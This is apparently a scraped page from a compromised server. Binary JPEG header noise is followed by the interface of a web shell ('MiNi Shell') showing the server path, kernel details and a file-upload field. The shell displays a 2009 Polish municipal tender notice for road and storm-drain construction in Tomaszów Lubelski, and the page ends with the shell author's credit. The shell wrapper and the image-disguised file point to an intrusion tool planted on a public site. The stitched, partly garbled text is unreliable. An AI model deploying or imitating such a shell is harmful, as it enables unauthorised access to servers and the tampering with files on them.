JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/66936-N-2009.html

<p class="kh_header"><b>Tomaszów Lubelski: Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z budową nawierzchni drogi ul. Na Skarpie, etap I (0+150÷0+417) z kanalizacją deszczową, w Tomaszowie Lubelskim</b><br>
<b>Numer ogłoszenia: 66936 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta w Tomaszowie Lubelskim , ul. Lwowska 57, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6642125, faks 084 664 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-lubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z budową nawierzchni drogi ul. Na Skarpie, etap I (0+150÷0+417) z kanalizacją deszczową, w Tomaszowie Lubelskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z budową nawierzchni drogi ul. Na Skarpie, etap I (0+150÷0+417) z kanalizacją deszczową, w Tomaszowie Lubelskim.
2. Roboty budowlane zostały określone w projekcie budowlanym pn. Projekt budowlany na budowę nawierzchni drogi gminnej nr 111848L ulicy Na Skarpie w Tomaszowie Lubelskim z jednostronnym chodnikiem i kanalizacją deszczową I etap  opracowanym przez Pracownię Projektów Drogowych i obejmują w szczególności:
Część drogowa:
a) rozebranie nawierzchni z płyt żelbetowych pełnych o powierzchni do 3 m2 - 117,00 m2,
b) transport płyt żelbetowych z rozbiórki samochodem skrzyniowym
z załadunkiem i wyładunkiem mechanicznym na odległość do 1 km		- 126,36 t,
c) montaż krawężników betonowych wystających o wymiarach
15x30 cm z wykonaniem ław betonowych z oporem na podsypce
cementowo - piaskowej wg planu zagospodarowania terenu		-   544,00 m,
d) profilowanie i zagęszczenie podłoża wykonane mechanicznie
w gruncie kat. II-IV pod warstwy konstrukcyjne nawierzchni		- 1386,00 m3,
e) wykonanie warstwy odsączającej i zagęszczenie mechaniczne o gr. 15 cm	- 1386,00 m2,
f) wykonanie podbudowy betonowej z betonu B-10 gr. 20 cm		- 1473,50 m2,
g) wykonanie warstwy ścieralnej z asfaltobetonu KR-1 o gr. 4 cm		- 1483,00 m2,
h) wykonanie warstwy wiążącej z asfaltobetonu KR-1 o gr. 5 cm		- 1483,00 m2,
i) wykonanie pionowego oznakowania drogowego - słupki z rur stalowych - 6 szt.,
j) wykonanie pionowego oznakowania drogowego - znaki zakazu, nakazu,
ostrzegawcze i informacyjne o pow. ponad 0,3 m2		- 4 szt.,
k) wykonanie oznakowania drogowego pionowego - zapora drogowa
U-12 o pow. ponad 0,3 m2					- 1 szt.,
i innych robót towarzyszących objętych w projekcie budowlanym.
Część sanitarna
a) wykonanie kanału z rur PCV łączonych na wcisk o śr. zew. 400 mm -   56,00 m,
b) wykonanie kanału z rur PCV łączonych na wcisk o śr. zew. 315 mm -   139,50 m,
c) wykonanie kanału z rur PCV łączonych na wcisk o śr. zew. 200 mm -   30,00 m,
d) wykonanie studni kołowych, włazowych o śr. wew. 1200 mm
z elementów prefabrykowanych żelbetowych łączonych na
uszczelki w gotowym wykopie o gł. do 3 m			- 5 szt.,
e) wykonanie wpustów ulicznych				- 9 szt.,
i innych robót towarzyszących objętych w projekcie budowlanym.
3. Zakres zamówienia obejmuje również:
a) prowadzenie pełnej obsługi geodezyjnej,
b) wykonanie wszelkich prób i badań odbiorowych wynikających z obowiązujących przepisów i norm PN,
c) uzyskanie wszelkich uzgodnień i decyzji na realizację zadania,
d) zorganizowanie i zabezpieczenie placu budowy oraz zaplecza budowy,
e) przedłożenie wymaganych świadectw bezpieczeństwa, certyfikatów i atestów na wbudowane materiały i urządzenia,
f) wykonanie i przedłożenie dokumentów odbioru technicznego oraz powykonawczej inwentaryzacji geodezyjnej.
4. Zgodnie z art.29 ust. 3 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza możliwość składania ofert równoważnych.
5. Wykonawca, który w ofercie powoła się na zastosowanie równoważnych materiałów i urządzeń jest zobowiązany do dołączenia do oferty:
a) dokumentów (aprobat, certyfikatów) materiałów i urządzeń równoważnych potwierdzających, że parametry techniczno-technologiczne oraz użytkowe propozycji równoważnych nie uległ pogorszeniu;
b) oświadczenie, że ewentualny projekt zamienny umożliwiający zastosowanie materiałów równoważnych zostanie opracowany w terminie 2 tygodni od daty podpisania umowy i uzgodniony w niezbędnym zakresie z projektantem i instytucjami uzgadniającymi;
c) oświadczenie, że wymagany termin robót budowlanych zostanie zachowany.
6. Specyfikacja techniczna wykonania i odbioru robót oraz Dokumentacja projektowa stanowią załącznik nr 6 i załącznik nr 7 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.00.00-8, 45.23.13.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagane wpłacenie wadium w wysokości 10.000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
a) spełniają wymagania określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tj.: 
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w oparciu o art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
b) w okresie ostatnich pięciu lat zrealizowali minimum 2 zadania w zakresie budowy drogi o charakterze i złożoności porównywalnej z robotami, których dotyczy postępowanie tj. ok. 1000 m2 nawierzchni drogi z mieszek mineralno - bitumicznych asfaltowych każde i dołączą dokumenty potwierdzające, że roboty te zostały wykonane należycie,
c) zapoznają się z treścią SIWZ, umową oraz przedmiotem zamówienia i przyjmują je bez zastrzeżeń,
d) posiadają dostęp do środków finansowych w wysokości 100.000 zł lub zdolność kredytową na poziomie 100.000 zł,
e) wpłacą wadium w wysokości   10.000 zł.
2.  Ocena spełnienia warunków zostanie dokonana na zasadzie spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów wymienionych w pkt. 6 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca w ramach oferty dostarczy następujące dokumenty i oświadczenia:
a) ofertę na formularzu zgodnie z  załącznikiem Nr 1 do SIWZ,
b) oświadczenie o spełnieniu wymogu art. 22 ust. 1 i art.24 ust.1 i 2 ustawy Pzp (załącznik Nr 3  do SIWZ),
c) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności  gospodarczej, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, 
d) oświadczenie potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne, lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
e) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy i odpowiednio art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
f) dokumenty potwierdzające uprawnienia pracowników do kierowania robotami budowlanymi drogowymi i sanitarnymi zgodnie z polskim prawem budowlanym, określonymi w specyfikacji i ksero aktualnego zaświadczenia o wpisie na listę Okręgowej Izby Inżynierów Budownictwa,
g)  informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (w wysokości 100.000 zł), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
h) polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
i) wykaz ważniejszych robót w zakresie budowy drogi o charakterze i złożoności porównywalnej z robotami, których dotyczy postępowanie zrealizowanych w przeciągu ostatnich 5 latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem lokalizacji wykonania, wartości, daty, nazwy zamawiającego - odbiorcy oraz dokumentami potwierdzającymi że roboty te zostały wykonane należycie (wg załącznika Nr 4 do SIWZ), z uwzględnieniem zadań określonych w pkt. 1.b, 
j) dowód wpłaty wadium 10.000 zł,
k) kosztorys ofertowy opracowany w oparciu o załączone do SIWZ  przedmiary robót stanowiący załącznik nr 2 do SIWZ i Specyfikację techniczną wykonania i odbioru robót.
2 .Dokumenty wymagane w przypadku składania oferty wspólnej (umowa konsorcjum):
a) pełnomocnictwo ustanowione przez wykonawców ubiegających się wspólnie. Pełnomocnictwo może dotyczyć zarówno reprezentowania wszystkich wykonawców w przetargu, jak i podpisania w ich imieniu umowy o zamówienie publiczne. Pełnomocnictwo musi wskazywać pełnomocnika (np. jeden z wykonawców, tzw. Lider lub zupełnie odrębna osoba). Dokument ten powinien wyliczać wszystkich wykonawców ubiegających się o zamówienie i szczegółowo określać prawa i obowiązki udzielonego pełnomocnictwa. Każdy z wykonawców ubiegających się wspólnie musi je podpisać.	
W przypadku ustanowienia pełnomocnika tylko do reprezentowania Wykonawców w postępowaniu, to przed podpisaniem umowy o udzielenie zamówienia Zamawiający będzie żądał zawartej umowy konsorcjum, obowiązującej, co najmniej na okres realizacji niniejszego zamówienia. Umowa ta musi określać sposób współdziałania, zakres prac przewidzianych do wykonania przez każdego z nich, zasady reprezentacji ( lider, podpisujący umowę, uprawniony do podejmowania zobowiązań, składający wadium, zasady odpowiedzialności zgodnie z art.141 ustawy Pzp ( w tym w szczególności zasadę odpowiedzialności solidarnej - art. 366 § 1 i 2 oraz art. 369 kodeksu cywilnego - za nie wykonanie zamówienia); 
b) dokumenty wymienione w SIWZ w pkt 6.1. lit. b, c, d oraz e muszą być złożone przez każdego partnera z osobna, pozostałe dokumenty składane są wspólnie. 
3. Wszystkie dokumenty mogą być składane w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę (osoby) uprawnioną do podpisywania oferty z dopiskiem -za zgodność z oryginałem. W przypadku pełnomocnictwa oraz umowy konsorcjum wymaga się przedstawienia oryginału lub kserokopii poświadczonej notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-lubelski.pl/infpub/przetargi.htm.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tomaszów Lubelski,   ul. Lwowska 57;   22 - 600 Tomaszów Lubelski,  pokój nr 29.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 11:00, miejsce: Urząd Miasta Tomaszów Lubelski,   ul. Lwowska 57;   22 - 600 Tomaszów Lubelski,  Sekretariat Burmistrza, pokój nr 23.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com